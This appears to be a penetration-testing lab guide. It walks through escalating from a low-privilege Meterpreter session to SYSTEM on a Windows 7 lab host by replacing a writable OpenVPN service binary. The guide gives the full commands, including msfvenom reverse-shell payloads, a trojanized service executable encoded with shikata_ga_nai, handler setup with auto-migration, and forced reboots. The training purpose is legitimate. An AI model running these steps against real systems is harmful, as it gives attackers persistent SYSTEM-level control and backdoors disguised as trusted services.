© 2018 Caendra, Inc.

| Hera for PTP | Privilege Escalation via Services 1

In this lab, you can practice privilege escalation techniques. It is important to know that the
remote system has been already compromised and a backdoor has already been installed.
This means that you can get a Meterpreter session on the remote machine without
exploiting it.

The lab diagram is the following:

Your machine will be directly connected to the remote target network (172.50.50.0/24).

© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation via Services 2
 • Identify and exploit a vulnerable implementation that may allow privilege escalation

• Identify vulnerable service configuration

• Escalate privileges via services misconfiguration

To guide you during the lab, you will find different Tasks.

Tasks are meant for educational purposes and to show you the usage of different tools plus
different methods to achieve the same goal. They are not meant to be used as a
methodology.

Armed with the skills acquired though the tasks, you can achieve the Lab goal.

If this is the first time you are doing this lab, we advise you to follow these Tasks.

Once you have completed all the Tasks, you can proceed to the end of this document and
check the solutions.

• Metasploit

Labs machines are not connected to the Internet.

© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation via Services 3
Since the lab is mainly focused on privilege escalation, let's assume we already have access
on the target machine. Our target machine OS is Windows 7.

As just stated, we have a working backdoor that you can connect by configuring to
Metasploit as follows:

Module: exploit/multi/handler
Payload: windows/meterpreter/bind_tcp
LPORT: 4450
RHOST: 172.50.50.10

With a working session, verify your privileges on the target machine. Obtain as much
information as possible such as software installed, services, user's privileges, groups, etc.

In the previous task, you should have gathered some useful information about the session
and the remote machine. For example, you should know that the session runs with a non-
privileged user and that the machine is Windows 7 SP1.

With the information gathered, identify a possible attack that may allow you to escalate
privileges up to SYSTEM.

© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation via Services 4
Please read the following hints only if you get stuck. Do not jump to the solution!

Some Metasploit modules may work but it is worth to note that few of them are not
reliable, since they have low or average rank. Instead of using these modules, try to gather
information about running services and think of a possible attack strategy.

The Windows Management Instrumentation Command-line (wmic) is a very useful tool

that can be used to query services.

Get a list of the running services as well as information about their binary paths. Do you
have write privileges on any of these paths?

The OpenVPN service is very tempting.

• It runs as SYSTEM
• It automatically starts on boot
• Its binary is stored into a folder on which we have write privileges.

© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation via Services 5
© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation via Services 6
We have already installed a backdoor on the remote machine. To get a Meterpreter session,
let's configure the Metasploit handler module as follows:

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(handler) > set LPORT 4450
LPORT => 4450
msf exploit(handler) > set RHOST 172.50.50.10
RHOST => 172.50.50.10
msf exploit(handler) > exploit

[*] Started bind handler

[*] Starting the payload handler...
[*] Sending stage (957999 bytes) to 172.50.50.10
[*] Meterpreter session 1 opened (172.50.50.100:33710 -> 172.50.50.10:4450) at 2016-
05-17 14:35:53 +0200

meterpreter >

Now we have a working session on the remote machine.

© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation via Services 7
During the information gathering phase, there are many tasks, modules and tools that we
can use. In these solutions, we will only see the only tasks and information needed to reach
our goal.

First, let us get some information about the remote machine, such as our privileges. We can
do this by running different modules and scripts such as: win_privs, getuid, winenum,
scraper and much more.

meterpreter > getuid

Server username: els-PC\els_user

Winenum is a great module. It gathers a lot of information from the remote system and
stores them into different files:

meterpreter > run winenum

[*] Running Windows Local Enumeration Meterpreter Script
[*] New session on 172.50.50.10:4450...
[*] Saving general report to /root/.msf4/logs/scripts/winenum/ELS-
PC_20160517.3735/ELS-PC_20160517.3735.txt
[*] Output of each individual command is saved to
/root/.msf4/logs/scripts/winenum/ELS-PC_20160517.3735
[*] Checking if ELS-PC is a Virtual Machine ........
[*] This is a VMware Workstation/Fusion Virtual Machine
[*] UAC is Disabled
[*] Running Command List ...
[*] running command net view
…

For example, let's list of the Administrator users:

root@kali:~/.msf4/logs/scripts/winenum/ELS-PC_20160517.3735# cat
net_localgroup_administrators.txt
Alias name administrators
Comment Administrators have complete and unrestricted access to the
computer/domain

Members
-------------------------------------------------------------------------------
Administrator
els
eLS_Admin
The command completed successfully.

© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation via Services 8
As we can see, els_user is not an Administrator. While, from the following file we can
see the els_user groups:

© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation via Services 9
Using win_privs, we can extract some information about the current user and its
privileges. In this scenario, UAC is not enabled and we are neither Admin nor SYSTEM user:

meterpreter > run post/windows/gather/win_privs

Current User
============

Is Admin Is System UAC Enabled Foreground ID UID

-------- --------- ----------- ------------- ---
False False False 1 "els-PC\\els_user"

Windows Privileges
==================

Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeShutdownPrivilege
SeUndockPrivilege

Since we are not Administrator, we have to find a way to escalate privileges to SYSTEM.

In this lab, we are not going to use any Metasploit module. Instead, we will try to exploit
service misconfigurations.

First, let's get the list of services installed on the machine. We can do this in few different
ways. For example, we can use net start:

meterpreter > shell

Process 1664 created.
Channel 40 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>net start
net start
These Windows services are started:

Base Filtering Engine

COM+ Event System
COM+ System Application
Computer Browser
Cryptographic Services
DCOM Server Process Launcher
…

© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation via Services 10
Further information can be extracted using another Windows tool named wmic. In this
case, the command is the following:

C:\Windows\system32>wmic service list brief

wmic service list brief
ExitCode Name ProcessId StartMode State Status
0 AeLookupSvc 0 Manual Stopped OK
1077 ALG 0 Manual Stopped OK
1077 AppIDSvc 0 Manual Stopped OK
1077 Appinfo 0 Manual Stopped OK
1077 AppMgmt 0 Manual Stopped OK
0 AudioEndpointBuilder 800 Auto Running OK
0 Audiosrv 756 Auto Running OK
1077 AxInstSV 0 Manual Stopped OK
1077 BDESVC 0 Manual Stopped OK
0 BFE 1180 Auto Running OK
1077 BITS 0 Manual Stopped OK
0 Browser 824 Manual Running OK
1077 bthserv 0 Manual Stopped OK
…

As we can see, for each service, we can obtain information such as name, state, and start
mode. Note that this is just a brief overview of the installed services. We will see how to get
more information later on in this document.

Now that we have enough information about our target machine, let's focus our operations
on how to escalate privileges. We don't have a working exploit for this task. Therefore, we
have to analyze the machine and find a possible way to exploit the machine.

To escalate privileges, we should find and exploit services that:

1. run with higher privileges

2. automatically start at boot
• OR can be restarted (with lower privileges)
• OR are vulnerable to DoS (meaning that we can cause the service to crash and
let Windows to automatically restart it)
3. have their binaries in paths where we have write privileges.

Hence, we could be able to escalate privileges if we find a service that has the previous
requisites.

© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation via Services 11
So, let's extract a complete overview of the installed services by running the following
command:

C:\Windows\system32>cd C:\Users\els
cd C:\Users\els

C:\Users\els>wmic service > serv_list.txt

wmic service > serv_list.txt

Note: Be sure to run the command in a path on the remote machine where you have
write privileges (C:\Users\els in our case).

We saved the wmic service command output into serv_list.txt so we can analyze the
results carefully from our system. So, let's download the file using the Meterpreter shell:

C:\Windows\system32>^C
Terminate channel 41? [y/N] y
meterpreter > download C:\\Users\\eLS\\serv_list.txt serv_list.txt
[*] downloading: C:\Users\eLS\serv_list.txt -> serv_list.txt
[*] download : C:\Users\eLS\serv_list.txt -> serv_list.txt
meterpreter >

We can now inspect its content:

© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation via Services 12
As we can see from the previous screenshots, this file contains everything we need for our
analysis. We can find the path for each service binary, as well as the associated user.
However, inspecting this file may be very tedious, so we have to find a way to filter it and
extract only the required information.

In the second screenshot, we can see that a lot of service binaries are stored in the
C:\Windows\system32 folder. Remember that one of our prerequisites is “having write
privileges on the path where the target service binary is stored”.

Usually, low privileged users, like ours: els_user, do not have write privileges on this
directory. So, if this is true, we can ignore all the services stored in system32.

© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation via Services 13
Let's check our privileges using icacls via the command shell:

meterpreter > shell

Process 3396 created.
Channel 43 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>icacls C:\windows\system32
icacls C:\windows\system32
C:\windows\system32 NT SERVICE\TrustedInstaller:(F)
NT SERVICE\TrustedInstaller:(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(M)
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
BUILTIN\Administrators:(M)
BUILTIN\Administrators:(OI)(CI)(IO)(F)
BUILTIN\Users:(RX)
BUILTIN\Users:(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files

As we can seem we have only RX (read – execute) privileges on this folder. This means
that we can ignore all the services that have the binary stored in the system32 folder.

To get a filtered list of services, we can tweak the wmic command used before. We want to
get all the services that do not have the string system32 in their binary path.

Here's the command that filters the search:

C:\Windows\system32>wmic service WHERE "NOT PathName LIKE '%system32%'" GET PathName,

Name
wmic service WHERE "NOT PathName LIKE '%system32%'" GET PathName, Name
Name PathName
clr_optimization_v2.0.50727_32
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
ehRecvr C:\Windows\ehome\ehRecvr.exe
ehSched C:\Windows\ehome\ehsched.exe
FontCache3.0.0.0
C:\Windows\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe
idsvc "C:\Windows\Microsoft.NET\Framework\v3.0\Windows
Communication Foundation\infocard.exe"
NetTcpPortSharing "C:\Windows\Microsoft.NET\Framework\v3.0\Windows
Communication Foundation\SMSvcHost.exe"
OpenVPNService C:\Program Files\OpenVPN\bin\openvpnserv.exe
TrustedInstaller C:\Windows\servicing\TrustedInstaller.exe
VMTools "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
WMPNetworkSvc "C:\Program Files\Windows Media Player\wmpnetwk.exe"

© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation via Services 14
The previous command printed out name (Name) and path (PathName) of the services that
do not have the string system32 in their PathName (string that defines the binary path of
the service).

Just as we did previously, let's save the results into a file and then download it locally:

C:\Windows\system32>wmic service WHERE "NOT PathName LIKE '%system32%'" GET PathName,

Name > C:\Users\els\filt_serv.txt
wmic service WHERE "NOT PathName LIKE '%system32%'" GET PathName, Name >
C:\Users\els\filt_serv.txt

C:\Windows\system32>^C
Terminate channel 45? [y/N] y
meterpreter > download C:\\Users\\els\\filt_serv.txt filt_serv.txt
[*] downloading: C:\Users\els\filt_serv.txt -> filt_serv.txt
[*] download : C:\Users\els\filt_serv.txt -> filt_serv.txt
meterpreter >

Let us open this file and check its contents.

As we can see, the output is shorter but, we still have all the information needed.

Now we should verify the permissions for each file and folder listed in it; we should also
check if we have write permissions on at least one of these.

Note that you can create a batch file that automatically does all these steps

© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation via Services 15
While running our tests on OpenVPNService, we can see that our user has write
permissions on the folder C:\Program Files\OpenVPN\bin.

C:\Windows\system32>icacls "C:\Program Files\OpenVPN\bin"

icacls "C:\Program Files\OpenVPN\bin"
C:\Program Files\OpenVPN\bin els-PC\els_user:(I)(OI)(CI)(M)
BUILTIN\Administrators:(I)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
NT SERVICE\TrustedInstaller:(I)(CI)(F)

Successfully processed 1 files; Failed processing 0 files

C:\Windows\system32>icacls "C:\Program Files\OpenVPN\bin\openvpnserv.exe"

icacls "C:\Program Files\OpenVPN\bin\openvpnserv.exe"
C:\Program Files\OpenVPN\bin\openvpnserv.exe els-PC\els_user:(I)(M)
BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

So far, we have one of the previous 3 prerequisites: write permissions. Let us check if
the OpenVPN service runs with higher privileges and if it automatically starts at boot.

We can check all of this by checking the file serv_list.txt. At line 64, we have the
OpenVPN service entry:

© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation via Services 16
As we can see, the StartMode is set to Auto and the StartName is LocalSystem. So, it
seems that the OpenVPN service matches all our requirements.

Since we have write permissions, we can replace the openvpnserv.exe file, that is the
binary executed when the service starts, with a custom exploit. Then, force a service restart
or the machine to reboot.

So, firstly, let us create our exploit with msfvenom as follows:

root@kali:~/LABS/15# msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.50.50.100

LPORT=4460 --platform Windows -f exe > openvpnserv.exe
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes

With the previous command, we create an exploit that tries a reverse TCP connection to
our machine at port 4460.

© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation via Services 17
Before uploading the exploit into the remote machine, let us create a backup of the original
openvpnser.exe using the mv command.

meterpreter > cd "C:\\Program Files\\OpenVPN\\bin"

meterpreter > mv openvpnserv.exe openvpnserv.exe.bck
meterpreter > ls
Listing: C:\Program Files\OpenVPN\bin
=====================================

Mode Size Type Last modified Name

---- ---- ---- ------------- ----
100777/rwxrwxrwx 161 fil 2014-02-24 13:03:51 +0100 addtap.bat
100777/rwxrwxrwx 198 fil 2014-02-24 13:03:51 +0100 deltapall.bat
100666/rw-rw-rw- 1206784 fil 2009-12-12 00:48:34 +0100 libeay32.dll
100666/rw-rw-rw- 86528 fil 2009-12-12 00:48:34 +0100 libpkcs11-helper-1.dll
100666/rw-rw-rw- 232448 fil 2009-12-12 00:48:34 +0100 libssl32.dll
100777/rwxrwxrwx 1534464 fil 2009-12-12 00:48:34 +0100 openssl.exe
100777/rwxrwxrwx 104696 fil 2009-12-12 00:48:34 +0100 openvpn-gui-1.0.3.exe
100777/rwxrwxrwx 578048 fil 2009-12-12 00:47:44 +0100 openvpn.exe
100666/rw-rw-rw- 36352 fil 2009-12-12 00:47:44 +0100 openvpnserv.exe.bck
100777/rwxrwxrwx 77312 fil 2009-12-12 00:48:34 +0100 tapinstall.exe

meterpreter > upload /root/LABS/15/openvpnserv.exe openvpnserv.exe

[*] uploading : /root/LABS/15/openvpnserv.exe -> openvpnserv.exe
[*] uploaded : /root/LABS/15/openvpnserv.exe -> openvpnserv.exe

Now that the exploit has been uploaded, we need to start a handler on our machine and
then force the service to restart. So let us create and start the handler:

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 172.50.50.100
LHOST => 172.50.50.100
msf exploit(handler) > set LPORT 4460
LPORT => 4460
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.50.50.100:4460

[*] Starting the payload handler...

We know that the service automatically starts when the machine boots, so we can try to
reboot the machine.

(As you can imagine, this is not very stealthy)

© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation via Services 18
In order to force a machine to reboot, we can use the following command from our
meterpreter shell:

msf exploit(handler) > sessions -i 1

[*] Starting interaction with 1...

meterpreter > reboot -f 2

Rebooting...

[*] 172.50.50.10 - Meterpreter session 1 closed. Reason: Died

Of course, as soon as we reboot the machine, we lose our Meterpreter session but after a
few seconds (once the remote machine starts again) we can see that the new handler we
created starts working. We got a new Meterpreter session with SYSTEM privileges!

msf exploit(handler) >

[*] Sending stage (957999 bytes) to 172.50.50.10

[*] Meterpreter session 2 opened (172.50.50.100:4460 -> 172.50.50.10:49155) at 2016-
05-17 15:55:20 +0200

That is great! The exploit works but after few seconds, the Meterpreter session dies.

msf exploit(handler) > sessions -i 2

[*] Starting interaction with 1...

meterpreter >

[*] 172.50.50.10 - Meterpreter session 2 closed. Reason: Died

This happens because Windows tries to start the service (our exploit is executed) but it
fails. By default, if the service does not successfully start, Windows kills it and we lose our
session.

© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation via Services 19
To avoid this, we can use different approaches:

1. Configure the module (handler) to automatically migrate once we get a new

session. We can do it by setting the option AutoRunScript with one of the two
following options:

msf exploit(handler) > set AutoRunScript explorer.exe

AutoRunScript => explorer.exe
msf exploit(handler) > set AutoRunScript migrate -f
AutoRunScript => migrate -f

2. Once got a session, run manually the command migrate. In this case, we need to be
very fast!
3. Inject our payload into the original binary (openvpnserv.exe). This will allow us
to get a new session while the OpenVPN service still works in background.

Let us see how to inject our payload into an existing binary, that is the alternative #3.

First, we need to download the original openvpnserv.exe locally. We can do this by using
our first Meterpreter session:

msf exploit(handler) > sessions -i 1

[*] Starting interaction with 1...
meterpreter > download "C:\\Program Files\\OpenVPN\\bin\\openvpnserv.exe.bck"
openvpnserv.exe.bck
[*] downloading: C:\Program Files\OpenVPN\bin\openvpnserv.exe.bck ->
openvpnserv.exe.bck
[*] download : C:\Program Files\OpenVPN\bin\openvpnserv.exe.bck ->
openvpnserv.exe.bck

Downloaded the original OpenVPN binary file, renamed to openvpnserv.exe.bck, we

have to inject a reverse TCP shell in it as follows:

root@kali:~/LABS/15# msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.50.50.100

LPORT=4460 -f exe -e x86/shikata_ga_nai -i 15 -k -x openvpnserv.exe.bck >
openvpnserv.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 15 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai succeeded with size 387 (iteration=1)
x86/shikata_ga_nai succeeded with size 414 (iteration=2)
x86/shikata_ga_nai succeeded with size 441 (iteration=3)
x86/shikata_ga_nai succeeded with size 468 (iteration=4)
x86/shikata_ga_nai succeeded with size 495 (iteration=5)
x86/shikata_ga_nai succeeded with size 522 (iteration=6)
x86/shikata_ga_nai succeeded with size 549 (iteration=7)
x86/shikata_ga_nai succeeded with size 576 (iteration=8)

© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation via Services 20
x86/shikata_ga_nai succeeded with size 603 (iteration=9)
x86/shikata_ga_nai succeeded with size 630 (iteration=10)
x86/shikata_ga_nai succeeded with size 657 (iteration=11)
x86/shikata_ga_nai succeeded with size 684 (iteration=12)
x86/shikata_ga_nai succeeded with size 711 (iteration=13)
x86/shikata_ga_nai succeeded with size 738 (iteration=14)
x86/shikata_ga_nai chosen with final size 738
Payload size: 738 bytes

As you can see, with msfvenom we can inject and encode the payload into an existing
binary.

First, we need to start the handler once again before we reboot the machine.

Reconfigure handler with the migrate option:

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 172.50.50.100
LHOST => 172.50.50.100
msf exploit(handler) > set LPORT 4460
LPORT => 4460
msf exploit(handler) > set AutoRunScript explorer.exe
AutoRunScript => explorer.exe
msf exploit(handler) > set AutoRunScript migrate -f
AutoRunScript => migrate -f
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

Now, let's copy the new openvpnserv.exe file back into the remote machine from the
existing meterpreter session, and reboot the machine once again:

meterpreter > cd "C:\\Program Files\\OpenVPN\\bin"

meterpreter > upload /root/LABS/15/openvpnserv.exe openvpnserv.exe
[*] uploading : /root/LABS/15/openvpnserv.exe -> openvpnserv.exe
[*] uploaded : /root/LABS/15/openvpnserv.exe -> openvpnserv.exe
meterpreter > reboot -f 2
Rebooting...

[*] 172.50.50.10 - Meterpreter session 1 closed. Reason: Died

After the reboot our exploit works fine and the connection is stable! Moreover, we have
SYSTEM privileges!

msf exploit(handler) >

[*] Sending stage (957999 bytes) to 172.50.50.10
[*] Meterpreter session 3 opened (172.50.50.100:4460 -> 172.50.50.10:49155) at 2016-
05-17 16:13:31 +0200
[*] Session ID 3 (172.50.50.100:4460 -> 172.50.50.10:49155) processing AutoRunScript
'migrate -f'

© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation via Services 21
[*] Current server process: openvpnserv.exe (1372)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2372
[+] Successfully migrated to process

msf exploit(handler) > sessions -i 3

[*] Starting interaction with 3...

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

© 2018 Caendra, Inc. | Hera for PTP | Privilege Escalation via Services 22